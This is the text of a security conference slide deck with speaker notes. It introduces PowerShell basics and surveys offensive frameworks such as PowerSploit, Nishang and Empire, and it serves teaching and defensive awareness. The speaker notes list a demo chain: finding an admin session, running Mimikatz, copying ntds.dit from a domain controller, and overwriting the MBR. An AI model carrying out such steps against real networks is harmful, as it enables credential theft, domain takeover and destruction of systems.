This talk covers the basics of how PowerShell works and how to use it. It then goes over a lot of the interesting offensive PowerShell tools that are available and gives a demo of using PowerShell to escalate to Domain Admin privileges on a network.
A video of the talk is available here: https://www.youtube.com/watch?v=YSUJNInriiY
2. PS C:>WHOAMI
Jared Haight
Security Engineer with the CLT team at Gotham Digital Science
Former Sysadmin
Hobbyist Developer
Corgi Enthusiast
@jaredhaight
3. WHY AREWE HERE?
I think PowerShell is pretty awesome
I want you to think PowerShell is pretty awesome
I’m going to give you a bunch of reasons that PowerShell is pretty
awesome
6. REDTEAMS
PowerShell is what the admins use to manage their infrastructure
Microsoft is pushing more and more tasks into PowerShell
Standard onWindows 7 and up
Robust, object oriented scripting language with access to a wide range of
things on the computer
Access to entire .NET andWMI frameworks
Lots of very interesting offensive projects going on
BlueTeams aren’t typically looking for it
7. BLUETEAMS
It’s what the bad guys are using.. like.. real ones.
There’s some really cool DFIR stuff going on with Powershell
8. WHAT DO I NEED TO KNOW
TO USE POWERSHELL?
Scripting for people whose idea of server administration is next > next > finish
9. VOCABULARY
String – Any combination of letters and numbers that are surrounded by
quotation marks (single or double). Used for printing stuff.
Example: “a”, “abc”, “abc123”, “123”
Integer – A number without quotes. Used for math.
Example: 1, 2, 3, 5
Boolean –True or False, represented in PS as $True or $False
Variable – A reference to a value that can be assigned over the course of a
script/program. Declared in PowerShell with as $[word], ex: $foo
10. OBJECTS
An object is a type of “something”.
As an object of a specific type, it inherits properties and methods related to
it’s object type
Properties – Information about the object
Methods – Code that interacts with the object
For example, strings have properties for length and methods to change the
case of their letters.
11. ARRAYS
A list of objects separated by commas
Example: “one”,”two”,”three”
You can access specific items in the array by using index numbers
Index starts at zero
12. CMDLETS
Primary way of getting things done in PowerShell
Always in a “verb-noun” format
Examples
write-host – print something to screen
get-process – get running processes
set-clipboard – copy something to clipboard
get-eventlog – get contents of eventlog
13. POWERSHELL SPECIFICS
Most everything is tab completable
Cmdlets
Parameters
ParameterValues
PowerShell ISE
“Integrated Scripting Editor” installed by default with PowerShell
IncludesVisual Studio like auto-completion (intellisense)
Sidebar featuring all available cmdlets
19. FOR LOOPS – PRACTICAL EXAMPLE OUTPUT
[...]
C:repos
-----
BUILTINAdministrators Allow FullControl
NT AUTHORITYSYSTEM Allow FullControl
BUILTINUsers Allow ReadAndExecute, Synchronize
NT AUTHORITYAuthenticated Users Allow Modify,
Synchronize
NT AUTHORITYAuthenticated Users Allow -536805376
C:Sandbox
-----
NT AUTHORITYAuthenticated Users Allow FullControl
Everyone Allow FullControl
[...]
20. LOGIC
Logic in programming amounts to “if foo is true, do bar”
You can compare things in PowerShell with:
-lt – Less than
-le – Less than or equal to
-eq – Equal to
-ne – Not equal to
-ge – Greater than or equal to
-gt – Greater than
21. LOGIC – IF/ELSE STATEMENTS
1 $nums = 1,2,3,4,5,6,7,8,9,10
2 forEach ($num in $nums)
3 {
4 if ($num -eq 4)
5 {
6 write-host $num is four.
7 }
8 else
9 {
10 write-host $num is not four.
11 }
12 }
Output
1 is not four.
2 is not four.
3 is not four.
4 is four.
5 is not four.
6 is not four.
7 is not four.
8 is not four.
9 is not four.
10 is not four.
Code
23. FIGURING STUFF OUT
Get-Command [Search term]
Example: get-command “*clipboard”
Get-Help “Command”
It gets help.
Example: get-help write-host
Example: get-help write-host –examples
Get-Member
Pipe an object to it to find out the objects properties and methods
Example $dir | get-member
31. DOING FUN STUFF WITH
POWERSHELL
I may have a strange definition of “fun”
32. REGISTRY FUN – REGISTRY AS A DRIVE
PS C:> cd HKCU:
PS HKCU:> cd .SOFTWARE
PS HKCU:SOFTWARE> dir Micro*
Hive: HKEY_CURRENT_USERSOFTWARE
Name Property
---- --------
Microsoft
Microsoft Corporation
Microsoft Studios
33. REGISTRY FUN – CREATING ENTRIES
# Does the key exist?
PS HKCU:SOFTWARE> test-path "BSidesCHS"
False
# Create key
PS HKCU:SOFTWARE> new-item "BSidesCHS"
Hive: HKEY_CURRENT_USERSOFTWARE
Name Property
---- --------
BSidesCHS
# Create item in key
PS HKCU:SOFTWARE> New-ItemProperty -path .BSidesCHS -Name Demo
-PropertyType String -Value "TextGoesHere"
34. REMOTE FUN
Most (all?) cmdlets understand UNC paths
test-path serversharetest.txt
A lot of cmdlets support the –ComputerName parameter.
stop-service spooler –ComputerName demo-dc01
WinRM makes everything better
Microsofts Remote Management service
enter-pssession demo-dc01
invoke-command –ComputerName demo-dc01 “{code}”
37. WHAT CAN WE BREAK?
There is a lot of really impressive work going into offensive PowerShell
frameworks.
Recon
Backdoors
Shellcode
Exfiltration
Privesc
Lots of very smart and devious people working on PowerShell frameworks
Big focus on “in memory” attacks.
Don’t touch the disk, don’t trip AV.
40. COOLTHINGS IN POWERSPLOIT
Exfiltration
Invoke-NinjaCopy – Copies a file from NTFS by reading the raw volume
and parsing NTFS structures
Inoke-Mimikatz – Loads Mimikatz into memory and runs it. Doesn’t
touch disk when run against a remote computer.
Get-GPPPassword – Browses Group Policy and finds passwords
Code Execution
Invoke-Shellcode – Inject shellcode into a specified process
Mayhem
Set-MasterBootRecord –Writes a string to the MBR
Set-CriticalProcess - BSOD
41. VEIL POWERTOOLS
https://github.com/PowerShellEmpire/PowerTools
Part of the Empire Framework now
Components
PewPewPew – Run commands against a list of servers without touching
the HDD
PowerBreach – Offers a variety of ways to trigger backdoor code
PowerPick – Allows the execution of PS code without powershell.exe
PowerUp – Assists with local escalation
PowerView – Network awareness tool
42. COOL STUFF IN POWERTOOLS
PowerView
Invoke-StealthUserHunter – Finds Home Directory server and checks for active sessions
from specific users accounts
Invoke-FindLocalAdminAccess – Finds machines that the current account has admins
rights on
Get-ExploitableSystems – Cross references systems against common metasploit
payloads
PowerBreach
Invoke-DeadUserBackdoor –Triggers a payload if a given user account is deleted
Invoke-EventLogBackdoor –Triggers a payload if a specific user fails an RDP login
PewPewPew
Invoke-MassCommand – Runs a given command against a bunch of servers
Invoke-MassMimikatz – Runs mimikatz against all the things.
44. COOLTHINGS ABOUT NISHANG
Client
Out-Word – Creates a word file (or infect an existing one) with a macro
that downloads and runs a PowerShell script
Also see: Out-Excel, Out-HTA, Out-CHM, Out-Shortcut and Out-Java
Backdoors
DNS_Txt_Pwnage – A backdoor that receives commands through DNS
TXT queries
Gupt-Backdoor – A backdoor that receives commands fromWLAN SSIDs
(without connecting)
45. .DESCRIPTION
Gupt looks for a specially crafted Wireless
Network Name/SSID from list of all available
networks. It matches first four characters of
each SSID with the parameter MagicString. On a
match, if the 5th character is a 'c', rest of the
SSID name is considered to be a command and
executed. If the 5th character is a 'u', rest of
the SSID is considered the id part of Google URL
Shortener and a script is downloaded and
executed in memory from the URL.
48. EMPIRE
http://www.powershellempire.com/
Pure PowerShell post-exploitation agent
Cryptographically secure communications
Flexible “phone-home” architecture
Think Meterpreter, but native PowerShell
Combines a lot of the modules present in other frameworks into an easy to
use reverse shell
49. USING EMPIRE
Obtain a Linux server
git clone https://github.com/powershellempire/empire && cd
empire/config && ./install.sh
Setup listeners (HTTP/S endpoints) on the server
Generate launchers (PowerShell code that runs on clients that makes
them phone home)
Run launchers client side
Receive shells
52. LEARNING MORE POWERSHELL
MicrosoftVirtual Academy (https://mva.microsoft.com/)
LearnWindows Powershell in a Month of Lunches (it’s a book)
Google
Get your hands dirty
Spin up a lab and play
Find stuff to Powershellify on the job
55. THE END
Questions?
@jaredhaight
jhaight@gdssecurity.com
Charlotte Hackers – http://www.charlottehackers.com
Gotham Digital Science – http://www.gdssecurity.com
Hinweis der Redaktion
This won’t be in depth
Don’t really expect people to leave here and be able code in PS
My goal here is to show you how easy it is to get started with PS and do some really cool stuff.
Also want to highlight some of the awesome stuff going on in infosec
* I’m not a developer.
* I tend to get my vocabulary mixed up. I apologize in advance.
* The stuff I make works though, so that’s good.
Deep Panda – Attacked National Security Think Tanks using Powershell as scheduled tasks to download and execute RATs
APT 29 – Twitter based C2 that got powershell commands from tweets
Primary thing you do in PS is run cmdlets.
You can write your own cmdlets, usually written in C#
Comparisons are the same as bash
The directory object has a method called “GetAccessControl”, which returns an ACL object
Test-path for KEY
New-item for KEY
New-ItemProperty for Value
WinRM is a SOAP based API for managing Windows
WinRM default install on 2008+, but must be enabled.
* Offensive community is driven by a lot of mature pentesters.
* $repo can be a folder, ps1 file or psm1 file.
* There’s a LOT to Nishang. Very active, robust framework.
Description of Grupt-Backdoor from the PS file.
Log in as helpdesk to demo-client1
Invoke-Userhunter (find MrAdmin on demo-client2)
invoke-mimikatz –demo-client2
Start new PS instance as MrAdmin
Import-module C:\repos\PowerTools\Powerview
Get-netDomainController
Import-Module C:\repos\Powersploit
Invoke-ninjacopy –Path C:\windows\ntds\ntds.dit –ComputerName demo-dc01 –LocalDest C:\repos
Start new admin PS instance
Import-Module C:\repos\Powersploit
Set-masterbootrecord “l33th4x0r”
Restart-computer
Empire is the magnum opus of offensive powershell
As part of the setup, a unique string is generated. This is used to encrypt the powershell code for the launchers
Launchers phone home (not constant connection)